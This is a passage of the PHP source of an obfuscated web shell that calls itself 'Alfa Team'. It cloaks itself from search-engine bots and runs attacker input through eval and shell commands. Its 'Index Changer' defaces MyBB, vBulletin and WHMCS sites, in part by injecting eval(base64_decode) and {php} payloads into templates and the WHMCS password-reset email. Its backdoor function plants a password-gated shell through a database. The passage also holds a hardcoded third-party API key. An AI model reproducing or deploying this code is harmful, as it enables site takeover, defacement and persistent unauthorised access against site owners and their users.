"beetween_perms" => "#FFFFFF", "main_actions" => array("key_color" => "#FFFFFF", "multi_selector" => array(".main .actions" => "color: {color};")), "menu_options:hover" => array("key_color" => "#646464", "multi_selector" => array(".menu_options:hover" => "background-color: {color};font-weight: unset;")), "minimize_editor_background" => array("key_color" => "#0e304a", "multi_selector" => array(".minimized-wrapper" => "background-color: {color};")), "minimize_editor_text" => array("key_color" => "#f5deb3", "multi_selector" => array(".minimized-text" => "color: {color};")), "editor_border" => array("key_color" => "#0e304a", "multi_selector" => array(".editor-explorer,.editor-modal" => "border: 2px solid {color};")), "editor_background" => array("key_color" => "rgba(0, 1, 23, 0.94)", "multi_selector" => array(".editor-explorer,.editor-modal" => "background-color: {color};")), "editor_header_background" => array("key_color" => "rgba(21, 66, 88, 0.93)", "multi_selector" => array(".editor-header" => "background-color: {color};")), "editor_header_text" => array("key_color" => "#00ff7f", "multi_selector" => array(".editor-path" => "color: {color};")), "editor_header_button" => array("key_color" => "#1d5673", "multi_selector" => array(".close-button, .editor-minimize" => "background-color: {color};")), "editor_actions" => array("key_color" => "#FFFFFF", "multi_selector" => array(".editor_actions" => "color: {color};")), "editor_file_info_vars" => array("key_color" => "#FFFFFF", "multi_selector" => array(".editor_file_info_vars" => "color: {color};")), "editor_file_info_values" => array("key_color" => "#67ABDF", "multi_selector" => array(".filestools" => "color: {color};")), "editor_history_header" => array("key_color" => "#14ff07", "multi_selector" => array(".hheader-text,.history-clear" => "color: {color};")), "editor_history_list" => array("key_color" => "#03b3a3", "multi_selector" => array(".editor-file-name" => "color: {color};")), "editor_history_selected_file" => array("key_color" => "rgba(49, 55, 93, 0.77)", "multi_selector" => array(".is_active" => "background-color: {color};")), "editor_history_file:hover" => array("key_color" => "#646464", "multi_selector" => array(".file-holder > .history:hover" => "background-color: {color};")), "input_box_border" => array("key_color" => "#0E304A", "multi_selector" => array("input[type=text],textarea" => "border: 1px solid {color}")), "input_box_text" => array("key_color" => "#999999", "multi_selector" => array("input[type=text],textarea" => "color: {color};")), "input_box:hover" => array("key_color" => "#27979B", "multi_selector" => array("input[type=text]:hover,textarea:hover" => "box-shadow:0 0 4px {color};border:1px solid {color};")), "select_box_border" => array("key_color" => "#0E304A", "multi_selector" => array("select" => "border: 1px solid {color}")), "select_box_text" => array("key_color" => "#FFFFEE", "multi_selector" => array("select" => "color: {color};")), "select_box:hover" => array("key_color" => "#27979B", "multi_selector" => array("select:hover" => "box-shadow:0 0 4px {color};border:1px solid {color};")), "button_border" => array("key_color" => "#27979B", "multi_selector" => array("input[type=submit],.button,#addup" => "border: 1px solid {color};")), "button:hover" => array("key_color" => "#27979B", "multi_selector" => array("input[type=submit]:hover" => "box-shadow:0 0 4px {color};border:2px solid {color};", ".button:hover,#addup:hover" => "box-shadow:0 0 4px {color};border:1px solid {color};")), "outputs_text" => array("key_color" => "#67ABDF", "multi_selector" => array(".ml1" => "color: {color};")), "outputs_border" => array("key_color" => "#0E304A", "multi_selector" => array(".ml1" => "border: 1px solid {color};")), "uploader_border" => array("key_color" => "#0E304A", "multi_selector" => array(".inputfile" => "box-shadow:0 0 4px {color};border:1px solid {color};")), "uploader_background" => array("key_color" => "#0E304A", "multi_selector" => array(".inputfile strong" => "background-color: {color};")), "uploader_text_right" => array("key_color" => "#FFFFFF", "multi_selector" => array(".inputfile strong" => "color: {color};")), "uploader_text_left" => array("key_color" => "#25ff00", "multi_selector" => array(".inputfile span" => "color: {color};")), "uploader:hover" => array("key_color" => "#27979B", "multi_selector" => array(".inputfile:hover" => "box-shadow:0 0 4px {color};border:1px solid {color};")), "uploader_progress_bar" => array("key_color" => "#ff0000", "multi_selector" => array("#up_bar" => "background-color: {color};")), "mysql_tables" => "#00FF00", "mysql_table_count" => "#67ABDF", "copyright" => "#ff0000", "scrollbar" => array("key_color" => "#1e82b5", "multi_selector" => array("*::-webkit-scrollbar-thumb" => "background-color: {color};")), "scrollbar_background" => array("key_color" => "#000115", "multi_selector" => array("*::-webkit-scrollbar-track" => "background-color: {color};"))); goto tgUps; iV_HZ: function alfawhois() { goto A0W4y; hyyo_: echo "</div>"; goto O9OwH; A0W4y: echo "<div class='header'><center><p><div class='txtfont_header'>| Whois |</div></p><p><form onsubmit="g('whois',null,this.url.value,'>>');return false;"><div class='txtfont'>Url: </div> <input type='text' name='url' style='text-align:center;' size='50' placeholder='google.com'> <input type='submit' value=' '></form></p></center>"; goto XzaUL; XzaUL: if ($_POST["alfa2"] == ">>" && !empty($_POST["alfa1"])) { goto UNxUN; K22RP: $data = @file_get_contents($target); goto EA00J; D9k4V: $target = "http://api.whoapi.com/?apikey=093b6cb9e6ea724e101928647df3e009&r=whois&domain=" . $site; goto K22RP; EA00J: if ($data == '') { goto b3nQb; DrZlT: $get->ssl = true; goto fWDU_; fWDU_: $data = $get->Send($target); goto LeRpj; b3nQb: $get = new AlfaCURL(); goto DrZlT; LeRpj: } goto J2BUY; LY_YT: if (is_array($target)) { echo $target["whois_raw"]; } else { echo alfaEx("whois " . $site); } goto ZxRZt; UNxUN: $site = str_replace(array("http://", "https://", "www.", "ftp://"), '', $_POST["alfa1"]); goto D9k4V; l5AWs: echo __pre(); goto LY_YT; J2BUY: $target = @json_decode($data, true); goto l5AWs; ZxRZt: } goto hyyo_; O9OwH: } goto MFegA; FIVWW: unset($GLOBALS["NeUSMyPGXP"]); goto bdpLb; T0gbq: function _alfa_file($file, $cgi = true) { $array = @file($file); if (!$array) { if (strlen(alfaEx("id", false, $cgi)) > 0) { $data = alfaEx("cat "" . addslashes($file) . """, false, $cgi); if (strlen($data) > 0) { return explode("\xa", $data); } else { return false; } } else { return false; } } else { return $array; } } goto c9DPC; yCRiB: function reArrayFiles($file_post) { goto Fcj3h; e7LmA: $file_keys = array_keys($file_post); goto cyDrD; s2nfA: return $file_ary; goto ZAbaf; cyDrD: for ($i = 0; $i < $file_count; $i++) { foreach ($file_keys as $key) { $file_ary[$i][$key] = $file_post[$key][$i]; } } goto s2nfA; fZXdD: $file_count = count($file_post["name"]); goto e7LmA; Fcj3h: $file_ary = array(); goto fZXdD; ZAbaf: } goto OG2z8; d6RZM: function showAnimation($name) { return "-webkit-animation: " . $name . " 800ms ease-in-out forwards;-moz-animation: " . $name . " 800ms ease-in-out forwards;-ms-animation: " . $name . " 800ms ease-in-out forwards;animation: " . $name . " 800ms ease-in-out forwards;"; } goto c0fnP; yiHNT: function alfahash() { goto KQ_jX; d69zq: foreach ($stringTools as $k => $v) { echo "<option value='" . htmlspecialchars($v) . "' " . ($_POST["alfa1"] == $v ? "selected" : '') . ">" . $k . "</option>"; } goto spc4E; KQ_jX: if (!function_exists("hex2bin")) { function hex2bin($p) { return decbin(hexdec($p)); } } goto pphob; spc4E: echo "</select> <input type='submit' value=' '/><br><textarea  name='input' style='margin-top:5px' class='bigarea'>" . (empty($_POST["alfa1"]) ? '' : htmlspecialchars(@$_POST["alfa2"])) . "</textarea></form>"; goto GiSUI; fw0_R: alfahead(); goto DDDQR; tKwWC: echo "</div>"; goto HSXcQ; HSXcQ: alfaFooter(); goto R5wa1; GiSUI: if (!empty($_POST["alfa1"])) { goto Xm7_g; Xm7_g: $string = addslashes($_POST["alfa2"]); goto PksNJ; IxRkb: ob_end_clean(); goto OQQhU; r50nr: eval("echo " . $code . ";"); goto qvwKY; N2TSO: ob_start(); goto r50nr; OQQhU: if (in_array($alg, $stringTools)) { echo "<textarea class="bigarea" id="PhpCode">" . htmlspecialchars($res) . "</textarea>"; } goto a9DXk; syiGI: $alg = $_POST["alfa1"]; goto TVfe3; qvwKY: $res = ob_get_contents(); goto IxRkb; TVfe3: $code = str_replace("$s", "'" . $string . "'", $alg); goto N2TSO; PksNJ: $string = str_replace("\"", """, $string); goto syiGI; a9DXk: } goto tKwWC; DDDQR: echo "<div class=header>"; goto tnb9U; tnb9U: echo "<form onSubmit='g("hash",null,this.selectTool.value,this.input.value);return false;'><div class='txtfont'>Method:</div> <select name='selectTool' style='width:400px;'>"; goto d69zq; pphob: if (!function_exists("full_urlencode")) { function full_urlencode($p) { goto kimrf; ySBzZ: for ($i = 0; $i < strlen($p); ++$i) { $r .= "%" . dechex(ord($p[$i])); } goto lR4xR; kimrf: $r = ''; goto ySBzZ; lR4xR: return strtoupper($r); goto aCRqE; aCRqE: } } goto SsZTR; SsZTR: $stringTools = array("Base64_encode ( $string )" => "__ZW5jb2Rlcg($s)", "Base64_decode ( $string )" => "__ZGVjb2Rlcg($s)", "strrev ( $string )" => "strrev($s)", "bin2hex ( $string )" => "bin2hex($s)", "hex2bin ( $string )" => "hex2bin($s)", "md5 ( $string )" => "md5($s)", "sha1 ( $string )" => "sha1($s)", "hash ( "sha251", $string ) --> sha251" => "hash("sha256",$s)", "hash ( "sha384", $string ) --> sha384" => "hash("sha384",$s)", "hash ( "sha512", $string ) --> sha512" => "hash("sha512",$s)", "crypt ( $string )" => "crypt($s)", "crc32 ( $string )" => "crc32($s)", "str_rot13 ( $string )" => "str_rot13($s)", "urlencode ( $string )" => "urlencode($s)", "urldecode  ( $string )" => "urldecode($s)", "full_urlencode  ( $string )" => "full_urlencode($s)", "htmlspecialchars  ( $string )" => "htmlspecialchars($s)", "base64_encode (gzdeflate( $string , 9)) --> Encode" => "__ZW5jb2Rlcg(gzdeflate($s, 9))", "gzinflate (base64_decode( $string )) --> Decode" => "@gzinflate(__ZGVjb2Rlcg($s))", "str_rot13 (base64_encode( $string )) --> Encode" => "str_rot13(__ZW5jb2Rlcg($s))", "base64_decode (str_rot13( $string )) --> Decode" => "__ZGVjb2Rlcg(str_rot13($s))", "str_rot13 (base64_encode(gzdeflate( $string , 9))) --> Encode" => "str_rot13(__ZW5jb2Rlcg(gzdeflate($s,9)))", "gzinflate (base64_decode(str_rot13( $string ))) --> Decode" => "@gzinflate(__ZGVjb2Rlcg(str_rot13($s)))"); goto fw0_R; R5wa1: } goto SsuhU; a6F74: function _alfa_file_exists($file, $cgi = true) { if (@file_exists($file)) { return true; } else { if (strlen(alfaEx("ls -la '" . addslashes($file) . "'", false, $cgi)) > 0) { return true; } } return false; } goto T0gbq; F6Q1N: if (!empty($_SERVER["HTTP_USER_AGENT"])) { $userAgents = array("Google", "Slurp", "MSNBot", "ia_archiver", "Yandex", "Rambler", "bot", "spider"); if (preg_match("/" . implode("|", $userAgents) . "/i", $_SERVER["HTTP_USER_AGENT"])) { header("HTTP/1.0 404 Not Found"); exit; } } goto ojyU9; pQKHQ: if ($check) { goto FGzsE; McdTK: foreach ($GLOBALS["NeUSMyPGXP"] as $key => $value) { $prefix = substr($key, 0, 2); if ($prefix == "us") { $GLOBALS["DB_NAME"]["user"] = $value; $GLOBALS["DB_NAME"]["user_rand"] = $key; } elseif ($prefix == "pa") { $GLOBALS["DB_NAME"]["pass"] = $value; $GLOBALS["DB_NAME"]["pass_rand"] = $key; } elseif ($prefix == "sa") { $GLOBALS["DB_NAME"]["safemode"] = $value; $GLOBALS["DB_NAME"]["safemode_rand"] = $key; } elseif ($prefix == "lo") { $GLOBALS["DB_NAME"]["login_page"] = $value; $GLOBALS["DB_NAME"]["login_page_rand"] = $key; } elseif ($prefix == "sh") { $GLOBALS["DB_NAME"]["show_icons"] = $value; $GLOBALS["DB_NAME"]["show_icons_rand"] = $key; } elseif ($prefix == "po") { $GLOBALS["DB_NAME"]["post_encryption"] = $value; $GLOBALS["DB_NAME"]["post_encryption_rand"] = $key; } } goto sS0mI; sS0mI: $_SESSION["alfa_db_settings"] = $GLOBALS["DB_NAME"]; goto bX0wx; FGzsE: $_SESSION["alfa_settings_signature"] = md5(print_r($GLOBALS["DB_NAME"], true)); goto McdTK; bX0wx: } else { $GLOBALS["DB_NAME"] = $_SESSION["alfa_db_settings"]; } goto FIVWW; uRin1: function __write_file($file, $content) { if ($fh = @fopen($file, "wb")) { if (fwrite($fh, $content) !== false) { return true; } } return false; } goto X_eJR; UNM1M: function output($string) { echo "<br><pre id="strOutput" style="margin-top:5px" class="ml1"><br><center><font color=red><a target='_blank' href='" . $string . "'>Click Here !</a></font></b></center><br><br>"; } goto FNPc5; I2eZU: if (!isset($GLOBALS["DB_NAME"]["login_page"])) { exit("$GLOBALS['DB_NAME']['login_page']"); } goto kB8SH; lFYVU: function Alfa_StrSearcher($dir, $string, $ext, $e, $arr = array()) { if (@is_dir($dir)) { $files = @scandir($dir); foreach ($files as $key => $value) { $path = @realpath($dir . DIRECTORY_SEPARATOR . $value); if (!@is_dir($path)) { goto n4SjX; bH9OT: if ($e == "str") { $content = @file_get_contents($path); if (strpos($content, $string) !== false) { echo str_replace("\", "/", $path) . "<br>"; } } else { if (strstr($value, $string)) { echo str_replace("\", "/", $path) . "<br>"; } } goto o_YJs; n4SjX: if ($ext != "*") { goto Vdktc; p12zU: $f = explode(".", $f); goto Evfpj; Vdktc: $f = basename($path); goto p12zU; WbsFE: if ($f != $ext) { continue; } goto jvnHq; Evfpj: $f = end($f); goto WbsFE; jvnHq: } goto bH9OT; o_YJs: $results[] = $path; goto m4Rfq; m4Rfq: } elseif ($value != "." && $value != "..") { Alfa_StrSearcher($path, $string, $ext, $e, $results); $results[] = $path; } } } } goto DxDYU; j_AU1: if ($GLOBALS["sys"] == "win") { goto JBaPw; JBaPw: $GLOBALS["home_cwd"] = str_replace("\", "/", $GLOBALS["home_cwd"]); goto HZCfc; MmL6g: $_SESSION[__PATH_HISTORY__] = str_replace("\", "/", $_SESSION[__PATH_HISTORY__]); goto j_4SQ; HZCfc: $GLOBALS["cwd"] = str_replace("\", "/", $GLOBALS["cwd"]); goto MmL6g; j_4SQ: } goto LiSIN; fQk2e: function alfaMakePwd() { goto ZxNli; ZxNli: if (_alfa_file_exists("/etc/virtual/domainowners") || _alfa_file_exists("/etc/named.conf") && _alfa_file_exists("/etc/valiases")) { return "/home/{user}/public_html/"; } goto qQatD; qQatD: $document = explode("/", $_SERVER["DOCUMENT_ROOT"]); goto zC6rC; F_0bO: return $path; goto qbsdE; N9svd: array_pop($document); goto Qfmm3; GxC9A: array_pop($document); goto N9svd; Qfmm3: $path = implode("/", $document) . "/{user}/" . $public; goto F_0bO; zC6rC: $public = end($document); goto GxC9A; qbsdE: } goto XBe80; xj_Ot: function alfaCssLoadColors() { goto c63pU; NnvWN: return $css; goto DxmB6; c63pU: $css = ''; goto MIo6C; MIo6C: foreach ($GLOBALS["__ALFA_COLOR__"] as $key => $value) { if (!is_array($value)) { $value = alfa_getColor($key); $css .= ".{$key}{color: {$value};}"; } else { if (isset($value["multi_selector"])) { foreach ($value["multi_selector"] as $k => $v) { goto Jlm1n; ktCJg: $css .= $k . "{" . $code . "}"; goto zIke3; Jlm1n: $color = alfa_getColor($key); goto sej2f; sej2f: $code = str_replace("{color}", $color, $v); goto ktCJg; zIke3: } } } } goto NnvWN; DxmB6: } goto aymIz; IQjN1: if (!empty($_POST["a"]) && function_exists("alfa" . $_POST["a"])) { call_user_func("alfa" . $_POST["a"]); } goto h7Dp9; JaYCP: function _alfa_fsockopen($server, $uri, $post) { $socket = @fsockopen($server, 80, $errno, $errstr, 15); if ($socket) { goto eyeyM; eMv1Y: $http .= "Content-Type: application/x-www-form-urlencoded
"; goto H6IPI; sLy1i: $http .= "User-Agent: " . $_SERVER["HTTP_USER_AGENT"] . "\xd
"; goto eMv1Y; rCmaU: $http .= "Connection: close\xd
\xd\xa"; goto uYm4i; hAl3i: fwrite($socket, $http); goto mInND; uYm4i: $http .= $post . "\xd\xa\xd\xa"; goto hAl3i; eyeyM: $http = "POST {$uri} HTTP/1.0
\xa"; goto Uxweg; mkhX3: @fclose($socket); goto ZmsxJ; o1KOu: while (!@feof($socket)) { $contents .= @fgets($socket, 4096); } goto iQ3z0; ZmsxJ: return $body; goto UONjX; mInND: $contents = ''; goto o1KOu; Uxweg: $http .= "Host: {$server}\xd
"; goto sLy1i; iQ3z0: list($header, $body) = explode("\xd\xa\xd
", $contents, 2); goto mkhX3; H6IPI: $http .= "Content-length: " . strlen($post) . "
\xa"; goto rCmaU; UONjX: } else { return ''; } } goto wokKq; LowdX: function alfaIndexChanger() { goto K1YH9; K1YH9: alfahead(); goto yL6Us; yL6Us: echo "<div class=header><center><p><div class="txtfont_header">| Index Changer |</div></p><h3><a href=javascript:void(0) onclick="g('IndexChanger',null,null,null,'whmcs')">| Whmcs | </a><a href=javascript:void(0) onclick="g('IndexChanger',null,'vb',null)">| vBulletin | </a><a href=javascript:void(0) onclick="g('IndexChanger',null,null,'mybb')">| MyBB | </a></h3></center>"; goto Fe8BJ; Y8P2c: if (isset($_POST["alfa2"]) && $_POST["alfa2"] == "mybb") { goto XJeD4; M_9Qg: $table = array("td1" => array("color" => "FFFFFF", "tdName" => "Mysql Host", "inputName" => "mybbdbh", "id" => "db_host", "inputValue" => "localhost", "inputSize" => "50"), "td2" => array("color" => "FFFFFF", "tdName" => "Db Name", "inputName" => "mybbdbn", "id" => "db_name", "inputValue" => '', "inputSize" => "50"), "td3" => array("color" => "FFFFFF", "tdName" => "Db User", "inputName" => "mybbdbu", "id" => "db_user", "inputValue" => '', "inputSize" => "50"), "td4" => array("color" => "FFFFFF", "tdName" => "Db Pass", "inputName" => "mybbdbp", "id" => "db_pw", "inputValue" => '', "inputSize" => "50")); goto v6OXM; atm2T: echo "<center><center><div class='txtfont_header'>| Mybb |</div>
<p><center>" . getConfigHtml("mybb") . "<form onSubmit="g('IndexChanger',null,'null','mybb',null,null,null,this.mybbdbh.value,this.mybbdbu.value,this.mybbdbn.value,this.mybbdbp.value,this.mybbindex.value); return false;" method=POST action=''>\xd\xa"; goto M_9Qg; qB99T: echo "<br><div class='txtfont'>| Your Index |</div><br>
\xa<textarea name=mybbindex rows='19' cols='103'>\xd
<title>Hacked By Sole Sad & Invisible</title><b>Hacked By Sole Sad & Invisible</b></textarea><p><input type='submit' value='' ></p></form></center></center>"; goto HlwDS; v6OXM: create_table($table); goto qB99T; HlwDS: if (isset($_POST["alfa6"])) { goto l72da; rCPby: $mybb_dbu = $_POST["alfa7"]; goto lRD30; no17K: $mybb_index = $_POST["alfa10"]; goto ZJdP8; WiYbL: $mybb_dbp = $_POST["alfa9"]; goto no17K; ZJdP8: if (!empty($mybb_dbh) && !empty($mybb_dbu) && !empty($mybb_dbn) && !empty($mybb_index)) { goto uwsRm; JMgSN: $prefix = "mybb_"; goto ZAh5T; uwsRm: $conn = @mysqli_connect($mybb_dbh, $mybb_dbu, $mybb_dbp, $mybb_dbn) or die(mysqli_error($conn)); goto JMgSN; SXVIS: $result = @mysqli_query($conn, $loli7) or die(mysqli_error($conn)); goto EiNYi; ZAh5T: $loli7 = "UPDATE " . $prefix . "templates SET template='" . $mybb_index . "' WHERE title='index'"; goto SXVIS; EiNYi: __alert("MyBB index changed...!"); goto QlXEz; QlXEz: } goto mapDo; l72da: $mybb_dbh = $_POST["alfa6"]; goto rCPby; lRD30: $mybb_dbn = $_POST["alfa8"]; goto WiYbL; mapDo: } goto UdQHN; XJeD4: echo __pre(); goto atm2T; UdQHN: } goto a3ffm; a3ffm: echo "</div>"; goto gE8MI; gE8MI: alfafooter(); goto Gw3B4; vaQe6: if (isset($_POST["alfa1"]) && $_POST["alfa1"] == "vb") { goto wbGt2; Ogiun: echo "<br><div class='txtfont'>| Your Index |</div><br>\xd\xa<textarea name='index' rows='19' cols='103'><title>Hacked By Sole Sad & Invisible</title><b>Hacked By Sole Sad & Invisible</b></textarea><br>\xd\xa<input type='submit' value=' '></form></center></center>"; goto WybE_; o1qqE: create_table($table); goto Ogiun; wbGt2: echo __pre(); goto MXMxq; MXMxq: echo "<center><center><div class='txtfont_header'>| vBulletin |</div>\xd\xa<p><center>" . getConfigHtml("vb") . "<form onSubmit="g('IndexChanger',null,'vb',this.dbu.value,this.dbn.value,this.dbp.value,this.dbh.value,this.index.value,this.prefix.value,'>>'); return false;">
"; goto n7DGh; n7DGh: $table = array("td1" => array("color" => "FFFFFF", "tdName" => "Mysql Host", "inputName" => "dbh", "id" => "db_host", "inputValue" => "localhost", "inputSize" => "50"), "td2" => array("color" => "FFFFFF", "tdName" => "Db Name", "inputName" => "dbn", "id" => "db_name", "inputValue" => '', "inputSize" => "50"), "td3" => array("color" => "FFFFFF", "tdName" => "Db User", "inputName" => "dbu", "id" => "db_user", "inputValue" => '', "inputSize" => "50"), "td4" => array("color" => "FFFFFF", "tdName" => "Db Pass", "inputName" => "dbp", "id" => "db_pw", "inputValue" => '', "inputSize" => "50"), "td5" => array("color" => "FFFFFF", "tdName" => "Prefix", "inputName" => "prefix", "id" => "db_prefix", "inputValue" => '', "inputSize" => "50")); goto o1qqE; WybE_: if ($_POST["alfa8"] == ">>") { goto yzyfm; ZLIic: $set_index .= __ZW5jb2Rlcg("echo "{$index}";"); goto S_8bN; d6ZUQ: $dbn = $_POST["alfa3"]; goto ch1hN; xUhmV: $prefix = $_POST["alfa7"]; goto wDi_s; ch1hN: $dbp = $_POST["alfa4"]; goto FyxRr; vOkz2: $dbu = $_POST["alfa2"]; goto d6ZUQ; Xe3Vx: if (!empty($dbh) && !empty($dbu) && !empty($dbn) && !empty($index)) { goto BmxNk; LoafJ: @mysqli_query($conn, $loli2) or die(mysqli_error($conn)); goto L25OP; kYIrP: __alert("VB index changed...!"); goto zZBOr; BmxNk: $conn = @mysqli_connect($dbh, $dbu, $dbp, $dbn) or die(mysqli_error($conn)); goto d_7hi; L25OP: @mysqli_query($conn, $loli3) or die(mysqli_error($conn)); goto kYIrP; JemFh: @mysqli_query($conn, $loli1) or die(mysqli_error($conn)); goto LoafJ; xTQp4: $loli3 = "UPDATE " . $prefix . "style SET css='" . $set_index . '' . $s0levisible . "', stylevars='', csscolors='', editorstyles=''"; goto JemFh; ADG8V: $loli2 = "UPDATE " . $prefix . "template SET template='" . $set_index . '' . $s0levisible . "' WHERE title='FORUMHOME'"; goto xTQp4; d_7hi: $loli1 = "UPDATE " . $prefix . "template SET template='" . $set_index . '' . $s0levisible . "' WHERE title='spacer_open'"; goto ADG8V; zZBOr: } goto j2ahp; yzyfm: $s0levisible = "Powered By Solevisible"; goto vOkz2; S_8bN: $set_index .= "\'))}}{${exit()}}"; goto Xe3Vx; FyxRr: $dbh = $_POST["alfa5"]; goto j_STq; wDi_s: $index = str_replace("\'", "'", $index); goto iOk6Y; j_STq: $index = $_POST["alfa6"]; goto xUhmV; iOk6Y: $set_index = "{${eval(base64_decode(\'"; goto ZLIic; j2ahp: } goto XAUU3; XAUU3: } goto Y8P2c; Fe8BJ: if (isset($_POST["alfa3"]) && $_POST["alfa3"] == "whmcs") { goto fIaI1; hXPND: if (isset($_POST["alfa6"])) { goto psbIr; IjfNZ: $Def = "{php}eval(base64_decode("" . $saveData . ""));{/php}"; goto SmgRt; dxsoc: $dbp = $_POST["alfa8"]; goto uPv4c; SmgRt: if (!empty($dbh) && !empty($dbu) && !empty($dbn) && !empty($index)) { goto nMmh7; rjMD2: $result2 = @mysqli_query($conn, $create) or die(mysqli_error($conn)); goto LgZMb; D03lI: $tempSave = str_replace("'", "\'", $tempSave1); goto Oi1VM; y6nDj: $result = @mysqli_query($conn, $inject) or die(mysqli_error($conn)); goto XYsPl; Oi1VM: $inject = "UPDATE tblemailtemplates SET message='{$Def}' WHERE name='Password Reset Validation'"; goto y6nDj; XYsPl: $create = "insert into tblclients (email) values('[email protected]')"; goto rjMD2; LgZMb: if (function_exists("curl_version")) { goto bx_a3; Ene4d: $backdata = "UPDATE tblemailtemplates SET message='{$tempSave}' WHERE name='Password Reset Validation'"; goto NeO3v; NeO3v: $Solevisible = mysqli_query($conn, $backdata) or die(mysqli_error($conn)); goto BjxUy; PDs9I: echo "<br><pre id="strOutput" style="margin-top:5px" class="ml1"><br><center><font color=red><a target='_blank' href='" . $path . "/" . $fname . "'>Click Here !</a></font></b></center><br><br>"; goto Sjp9z; yU9vC: $AlfaSole->Send($path . "/pwreset.php", "post", "token={$token[1]}&action=reset&[email protected]"); goto Ene4d; BjxUy: __alert("File Created..."); goto PDs9I; bx_a3: $AlfaSole = new AlfaCURL(true); goto z3hwA; SZyo6: $getToken = preg_match("/name="token" value="(.*?)"/i", $saveurl, $token); goto yU9vC; z3hwA: $saveurl = $AlfaSole->Send($path . "/pwreset.php"); goto SZyo6; Sjp9z: } else { echo "<br><pre id="strOutput" style="margin-top:5px" class="ml1"><br><center><b><font color="#FFFFFF">Please go to Target </font><font color=red>" " . $path . "/pwreset.php "</font><br/><font color="#FFFFFF"> and reset password with email</font> => <font color=red>[email protected]</font><br/><font color="#FFFFFF">and go to</font> <font color=red>" " . $path . "/" . $fname . " "</font></b></center><br><br>"; } goto xBdjg; cTfQa: $soleGet = mysqli_fetch_assoc($soleSave); goto q9HEn; nMmh7: $conn = @mysqli_connect($dbh, $dbu, $dbp, $dbn) or die(mysqli_error($conn)); goto FtaE0; FtaE0: $soleSave = @mysqli_query($conn, "select message from tblemailtemplates where name='Password Reset Validation'"); goto cTfQa; q9HEn: $tempSave1 = $soleGet["message"]; goto D03lI; xBdjg: } goto ch0zE; uPv4c: $dbh = $_POST["alfa9"]; goto mX_rd; lg3H5: $dbn = $_POST["alfa7"]; goto dxsoc; FfxyK: $dbu = $_POST["alfa6"]; goto sdHJj; nY2aw: $index = str_replace("\'", "'", $index); goto KZIV8; KZIV8: $deface = "$x = base64_decode("" . __ZW5jb2Rlcg($index) . ""); $solevisible = fopen("" . $fname . "","w"); fwrite($solevisible,$x);"; goto ALY64; sdHJj: $path = $_POST["alfa5"]; goto oIsLu; oIsLu: $fname = $_POST["alfa4"]; goto lg3H5; ALY64: $saveData = __ZW5jb2Rlcg($deface); goto IjfNZ; mX_rd: $index = $_POST["alfa10"]; goto nY2aw; psbIr: $s0levisible = "Powered By Solevisible"; goto FfxyK; ch0zE: } goto NlyRI; WJTvQ: echo "<center><center><div class='txtfont_header'>| Whmcs |</div>\xd
<p><center>" . getConfigHtml("whmcs") . "<form onSubmit="g('IndexChanger',null,null,null,'whmcs',this.fname.value,this.path.value,this.dbu.value,this.dbn.value,this.dbp.value,this.dbh.value,this.index.value); return false;">
\xa"; goto aHRDW; kbaoo: create_table($table); goto m1z2p; m1z2p: echo "<br><div class='txtfont'>| Your Index |</div><br>
<textarea name=index rows='19' cols='103'><title>Hacked By Sole Sad & Invisible</title><b>Hacked By Sole Sad & Invisible</b></textarea><br>\xd
<input type='submit' value=' '>
\xa</form></center></center>"; goto hXPND; fIaI1: echo __pre(); goto WJTvQ; aHRDW: $table = array("td1" => array("color" => "FFFFFF", "tdName" => "Mysql Host", "inputName" => "dbh", "id" => "db_host", "inputValue" => "localhost", "inputSize" => "50"), "td2" => array("color" => "FFFFFF", "tdName" => "URL", "inputName" => "path", "inputValue" => "http://site.com/whmcs", "inputSize" => "50"), "td3" => array("color" => "FFFFFF", "tdName" => "File Name", "inputName" => "fname", "inputValue" => '', "inputSize" => "50"), "td4" => array("color" => "FFFFFF", "tdName" => "Db Name", "inputName" => "dbn", "id" => "db_name", "inputValue" => '', "inputSize" => "50"), "td5" => array("color" => "FFFFFF", "tdName" => "Db User", "inputName" => "dbu", "id" => "db_user", "inputValue" => '', "inputSize" => "50"), "td6" => array("color" => "FFFFFF", "tdName" => "Db Pass", "inputName" => "dbp", "id" => "db_pw", "inputValue" => '', "inputSize" => "50")); goto kbaoo; NlyRI: } goto vaQe6; Gw3B4: } goto DWLcl; uneHH: function _AlfaSecretKey() { if (!isset($_SESSION["AlfaSecretKey"])) { $_SESSION["AlfaSecretKey"] = uniqid(mt_rand(), true); } return $_SESSION["AlfaSecretKey"]; } goto MOuuo; lG0uK: if (!function_exists("scandir")) { function scandir($dir) { goto I5z53; z3hjZ: while (false !== ($filename = readdir($dh))) { $files[] = $filename; } goto Kc_yZ; I5z53: $dh = opendir($dir); goto z3hjZ; Kc_yZ: return $files; goto ek4ww; ek4ww: } } goto yCRiB; K5_dd: function alfainbackdoor() { goto YfG9w; GKSGA: $textarea = "<div style='display:none;' id='backdoor_textarea'><div class='txtfont'>Your Shell:</div><p><textarea name='shell' rows='19' cols='103'><?php
\x9echo('Alfa Team is Here...!');\xa?></textarea></p></div>"; goto z9D8q; qPaf7: alfafooter(); goto I16OI; KKrpM: $cwd = "Example: /home/alfa/public_html/index.php"; goto VeUJ2; fdDSf: $error = "<font color="red">Error In Inject BackDoor...!<br>File Loader is not Writable Or Not Exists...!</font>"; goto nyPTZ; z9D8q: $select = "<div class='txtfont'>Use:</div> <select name='method' style='width:155px;' onChange='inBackdoor(this);'><option value='alfa'>Alfa Team Uploader</option><option value='my'>My Private Shell</option></select>"; goto KKrpM; n8BMP: if ($_POST["alfa1"] == "db") { goto zOS1r; Afit5: if ($_POST["alfa2"] != '' && $_POST["alfa3"] != '' && $_POST["alfa5"] != '' && $_POST["alfa6"] != '') { goto eJ9lN; clKWS: $method = $_POST["alfa7"]; goto ThHmT; zAabq: if ($method == "my") { $shell = __ZW5jb2Rlcg($shell); } else { $shell = $GLOBALS["__ALFA_SHELL_CODE"]; } goto yhg0D; ThHmT: $shell = $_POST["alfa8"]; goto UEqNW; qjZNb: $dbpw = $_POST["alfa4"]; goto leFui; PY9u0: $file = $_POST["alfa6"]; goto clKWS; eJ9lN: $dbhost = $_POST["alfa2"]; goto u0Rxx; scbBj: if ($key == '') { $key = "alfa"; } goto zAabq; u0Rxx: $dbuser = $_POST["alfa3"]; goto qjZNb; leFui: $dbname = $_POST["alfa5"]; goto PY9u0; UEqNW: $key = str_replace(array(""", "'"), '', trim($_POST["alfa9"])); goto scbBj; yhg0D: if ($conn = mysqli_connect($dbhost, $dbuser, $dbpw, $dbname)) { $code = "<?php if(isset($_GET["alfa"])&&$_GET["alfa"]=="" . $key . ""){$conn=mysqli_connect("" . str_replace(""", "\"", $dbhost) . "","" . 